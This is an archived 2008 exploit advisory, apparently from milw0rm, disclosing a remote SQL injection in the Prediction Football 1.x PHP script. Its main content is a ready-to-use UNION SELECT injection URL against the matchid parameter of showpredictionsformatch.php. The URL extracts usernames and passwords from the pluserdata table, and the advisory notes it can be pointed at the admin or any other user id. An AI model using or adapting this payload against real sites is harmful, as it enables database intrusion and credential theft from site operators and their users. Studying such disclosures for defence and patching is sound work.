Prediction Football 1.x (matchid) Remote SQL Injection Vulnerability :

Date : 2008-04-08 Author : 0in
/*

                                       Prediction Football v 1.x Remote SQL INJECTION

Discovered by 0in from Dark-Coders Programming & Security Group.

!!!!!! > http://dark-coders.4rh.eu < !!!!!!

Contact: 0in(dot)email(at)gmail(dot)com

Greetz to all Dark-Coders Group Members: Die_Angel, Sun8hclf, M4r1usz, Djlinux, Aristo89

Script homepage: http://www.predictionfootball.com/

Description:  Prediction Football is a program that provides a web based administration 
config and automated prediction leagues. This program supports multiple languages. This 
script makes predictions simultaneously. This helps you to message other users and capable 
of multiple fixture creation. This requires web server with support for PHP4.0 or greater, 
MySQL database. Very easy to download and install the program and execute.

*/

Exploit:

http://target.domain/[path]/showpredictionsformatch.php?sid=dupa&matchid=-666/**/union/**/select/**/1,2,3,concat(0x757365723a,username),concat(0x7061737377643a,password),6,7/**/from/**/pluserdata/**/WHERE/**/userid=1/*  

userid=1 - admin user have that userid, you can change that to another user.

//EoFF

# milw0rm.com [2008-04-08]

C1

 

C2

 

C3